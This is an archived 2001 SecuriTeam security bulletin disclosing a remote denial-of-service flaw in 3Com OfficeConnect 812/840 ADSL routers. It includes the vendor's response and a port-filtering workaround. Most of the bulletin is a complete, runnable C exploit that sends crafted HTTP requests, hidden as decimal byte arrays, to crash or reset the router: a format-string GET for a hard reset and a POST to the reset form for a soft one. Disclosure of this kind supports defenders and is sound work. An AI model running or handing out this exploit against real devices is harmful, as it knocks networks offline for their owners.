[EXPL] 3Com OfficeConnect 812/840 Router DoS Exploit Code
From: support@securiteam.comDate: 10/05/01
- Previous message: support@securiteam.com: "[UNIX] Format String Attacks on Alpha Systems"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [EXPL] 3Com OfficeConnect 812/840 Router DoS Exploit Code Message-Id: <20011005131242.9595D138C2@mail.der-keiler.de> Date: Fri, 5 Oct 2001 15:12:42 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
3Com OfficeConnect 812/840 Router DoS Exploit Code
------------------------------------------------------------------------
SUMMARY
3Com OfficeConnect 812/840 ADSL Router contains a security vulnerability
that allows remote attackers to cause the router to crash.
DETAILS
Workaround:
Filtering port 80 on the WAN interface is enough to prevent this DoS. Port
53 UDP and port 23 telnet are also wide open by default.
Vendor response:
"It appears that both individuals posting on these products have not taken
the opportunity to download the software patch for the OCR812 router
software version 1.1.9. In responding to the specific points above,
however, it is certainly possible to employ port filtering on the WAN
interface for ports 23 and 53 if the customer desires. Following the same
methodology as the port 80 filter available on the 3Com web site (
<http://support.3com.com/infodeli/tools/remote/ocradsl/http_filtering.pdf>
http://support.3com.com/infodeli/tools/remote/ocradsl/http_filtering.pdf).
More to the point however, our customers have requested that these routers
be managed remotely from the WAN by default. In most cases, they also
employ another method supported on these products called access lists.
Access lists will only allow IP addresses in the range configured to
access the management interfaces. For details on Access Lists see the
Command Line Interface manual available at:
<http://support.3com.com/infodeli/tools/remote/ocradsl/20/812_cli20.pdf>
http://support.3com.com/infodeli/tools/remote/ocradsl/20/812_cli20.pdf
Page 6-31 details how access lists are configured.
It is suggested that if access lists are used and used properly, the DoS
issues below do not exist."
Exploit:
// 3Com OfficeConnect 812/840 ADSL Router Denial of Service (maybe others)
// Proof of concept, soft and hard reset, the security is weak
// Written pour sniffer <sniffer@sniffer.net>
// Fri Sep 21 15:51:35 BRT 2001
// Viva Brazil!
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
void
usage(binary)
char *binary;
{
fprintf(stderr,"3Com OfficeConnect 812 ADSL Router Denial of Service
(%s)\nsniffer <sniffer@sniffer.net>\n\t%s <1 (soft) || 2 (hard)> <remote
router>\n", __FILE__, binary);
}
int
main(argc, argv)
int argc;
char **argv;
{
int sockfd;
char senddata[1024];
char hardreset_data[] = {
71,69,84,32,47,103,114,97,112,104,105,99,115,
47,115,109,108,51,99,111,109,37,115,37,115,37,
115,37,115,37,115,37,115,37,115,37,115,37,115,
37,115,37,115,37,115,37,115,37,115,37,115,37,
115,37,115,37,115,37,115,37,115,37,115,37,115,
37,115,37,115,37,115,37,115,37,115,37,115,37,
115,37,115,37,115,37,115,37,115,37,115,37,115,
37,115,37,115,37,115,37,115,37,115,37,115,37,
115,37,115,37,115,37,115,37,115,37,115,37,115,
37,115,37,115,37,115,37,115,37,115,37,115,37,
115,37,115,37,115,37,115,37,115,37,115,37,115,
37,115,37,115,37,115,37,115,32,72,84,84,80,
47,49,46,48,10,10,0 };
char softreset_data[] = {
80,79,83,84,32,47,70,111,114,109,115,47,97,
100,115,108,95,114,101,115,101,116,32,72,84,84,
80,47,49,46,49,10,72,111,115,116,58,32,49,
57,50,46,49,54,56,46,49,46,50,53,52,10,
67,111,110,110,101,99,116,105,111,110,58,32,99,
108,111,115,101,10,67,111,110,116,101,110,116,45,
76,101,110,103,116,104,58,32,49,57,10,10,83,
117,98,109,105,116,61,82,101,115,101,116,37,50,
48,76,105,110,101,10,10,0 };
struct hostent *he;
struct sockaddr_in their_addr;
if( argc != 3 )
{
usage(argv[0]);
exit(0);
}
if( atoi(argv[1]) >= 3 || atoi(argv[1]) == 0 )
{
usage(argv[0]);
exit(0);
}
if((he=gethostbyname(argv[2])) == NULL)
{
herror("gethostbyname");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(80);
their_addr.sin_addr = (*(struct in_addr *)he->h_addr);
bzero(&their_addr.sin_zero, 8);
if ((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct
sockaddr)) == -1)
{
perror("connect");
exit(1);
}
else
{
printf("connected\n");
}
if(atoi(argv[1]) == 1)
strncpy(senddata, softreset_data, strlen(softreset_data));
else if(atoi(argv[1]) == 2)
strncpy(senddata, hardreset_data, strlen(hardreset_data));
if(send(sockfd, senddata, sizeof(senddata), 0) == -1)
{
perror("send");
exit(1);
}
else
{
printf("evil data sent\n.. have a rice day\n");
}
close(sockfd);
return(0);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:sniffer@sniffer.net> Bruno
Ratnieks, <mailto:raistlin@gioco.net> Raistlin, and
<mailto:Tom_Kinahan@ne.3com.com> Tom Kinahan.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Format String Attacks on Alpha Systems"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- RE: PAWS security vulnerability
... FreeBSD security list" isn't grammatically correct. ... "I told you to post
the patch and info to the appropriate FreeBSD security ... "...This point and others are
often discussed on the mailing lists, ... (freebsd-questions) - May I have permission to travel???????
... ""Homeland Security Tightens Grip on International Travel ... The Department
of Homeland Security proposed new rules back in July ... These lists ...
Instead of providing a passenger manifest after departure as now ... (alt.true-crime) - RE: PAWS security vulnerability
... You STILL haven't taken this to the correct security mailing list, ... >
FreeBSD security ... >>lists, and you aren't the least bit interested in doing
what ... >>appropriate forum to post the patch, ... (freebsd-questions) - [NEWS] Cisco IOS Stack Group Bidding Protocol Crafted Packet DoS
... Get your security news from a reliable source. ... The SGBP implementation
provided by the Cisco Internetwork Operating ... This vulnerability affects any device
that runs Cisco IOS and has enabled ... to apply Access Control Lists to prevent untrusted
hosts from ... (Securiteam) - RE: Cant enter 2 XP machines into a Workgroup
... Firewalls like NIS modify Windows own security files. ... If a
comsumer level router like those of Linksys and Netgear ... (microsoft.public.windowsxp.network_web)
